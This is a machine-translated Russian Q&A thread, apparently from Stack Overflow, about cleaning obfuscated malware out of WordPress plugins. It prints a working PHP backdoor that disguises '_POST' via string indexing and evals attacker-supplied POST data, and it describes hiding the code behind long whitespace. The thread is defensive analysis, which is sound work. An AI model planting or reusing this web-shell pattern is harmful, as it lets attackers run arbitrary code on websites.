Итак, сегодня я очищаю сайт моего клиента и обнаружил, что на много плагина wordpress есть много аккуратного вредоносного кода.Wordpress вредоносный код, что он на самом деле делает?
Некоторые из них очень аккуратно (= D), но один из лучших является старый трюк положить много отступа после <?php
и положить вредоносный код до окончания его ?>
и открытие еще <?php
в конце строки поэтому похоже, что есть только один <?php
.
Теперь, что я спрашиваю, что будет делать этот вредоносный код? Это один из примеров кода я нашел:
$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}
Приведенный выше код должен был выдал ошибку ($qv
не массив), но это не так. Кто-нибудь может объяснить, что это такое?
Он вычисляет любой код в '$ _POST ['q571d85']'. fyi, доступ к нему, как массив, просто возвращает символ строки. –
нет strtoupper только в верхних корпусах. См. Http://php.net/language.types.string#example-94 –
@LawrenceCherone: да, я знаю, я понял ошибку, поэтому я отредактировал свой ответ, спасибо за ваше объяснение: D – user2002495